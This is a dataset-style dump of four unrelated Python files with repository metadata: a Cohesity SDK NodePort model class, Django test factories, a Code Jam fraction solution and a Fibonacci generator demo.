| 2021-01-15T08:23:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,851
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class NodePort(object):
"""Implementation of the 'NodePort' model.
VmInfo specifies information of a NodePort per service and port
combination within an application instance.
Attributes:
is_ui_port (bool): TODO: type description here.
port (int): TODO: type description here.
tag (TagEnum): Specifies use of the nodeport kDefault - No specific
service. kHttp - HTTP server. kHttps - Secure HTTP server. kSsh -
Secure shell server.
"""
# Create a mapping from Model property names to API property names
_names = {
"is_ui_port":'isUiPort',
"port":'port',
"tag":'tag'
}
def __init__(self,
is_ui_port=None,
port=None,
tag=None):
"""Constructor for the NodePort class"""
# Initialize members of the class
self.is_ui_port = is_ui_port
self.port = port
self.tag = tag
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
is_ui_port = dictionary.get('isUiPort')
port = dictionary.get('port')
tag = dictionary.get('tag')
# Return an object of this model
return cls(is_ui_port,
port,
tag)
|
[
"ashish@cohesity.com"
] |
ashish@cohesity.com
|
8cc261eb0ecfb093323305bc3cc656d8b5205b78
|
a6c13fb257563d99c45f79b2fee5c2f2f76251ef
|
/apps/common/factories.py
|
197597ddc5ded9aea5a8f9bfe7315a01f742e943
|
[] |
no_license
|
sipanmargaryan/addproduct
|
9999cdf9b611ea4f103ed9e58e24c8fc8fe0e3fb
|
9232c31956f154f3c4349fe3942a331559213c70
|
refs/heads/master
| 2022-11-05T19:23:37.209482
| 2020-06-26T14:44:45
| 2020-06-26T14:44:45
| 275,178,682
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 800
|
py
|
import factory
from django.utils import timezone
import common.models
class ArticleFactory(factory.DjangoModelFactory):
title = factory.Sequence(lambda n: 'help text title-{}'.format(n))
description = factory.Sequence(lambda n: 'help text description-{}'.format(n))
class Meta:
model = common.models.Article
class CategoryFactory(factory.DjangoModelFactory):
name = factory.Sequence(lambda n: 'category-{}'.format(n))
class Meta:
model = common.models.Category
class ServiceFactory(factory.DjangoModelFactory):
opening_time = factory.lazy_attribute(lambda x: timezone.now())
closing_time = factory.lazy_attribute(lambda x: timezone.now())
category = factory.SubFactory(CategoryFactory)
class Meta:
model = common.models.Service
|
[
"sipanm19@gmail.com"
] |
sipanm19@gmail.com
|
d765931611ffb0b15f7c1c88acfd00e0ac6f9f19
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_145/669.py
|
bd702b9e219525f76c3fa85711b680bca73aa591
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 688
|
py
|
#!/usr/bin/env python
import sys
import struct
import ctypes
def binary(num):
return ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', num))
T = int(sys.stdin.readline())
for case in range(0, T):
part = sys.stdin.readline()
up, down = part.split("/")
up = int(up)
down = int(down)
if int(bin(up&down)[2:]) != 0:
print "Case #%s: impossible" % (str(case+1) )
else:
for i in range(1, 40):
up = 2*up
if up >= down:
print "Case #%s: %d" % (str(case+1), i )
break
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
559e9d1a9a1c37ba4f8aae45a6b1828a164fe7ce
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/tests/demo_5.py
|
c5de86e214fd5babcc1639e86f60c6ee47de9df4
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025
| 2019-09-20T06:35:25
| 2019-09-20T06:35:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
def fib(times):
n = 0
a,b = 0, 1
while n < times:
yield b
a, b = b, a + b
n += 1
return "done"
g = fib(2)
next(g)
next(g)
# next(g)
|
[
"976185561@qq.com"
] |
976185561@qq.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.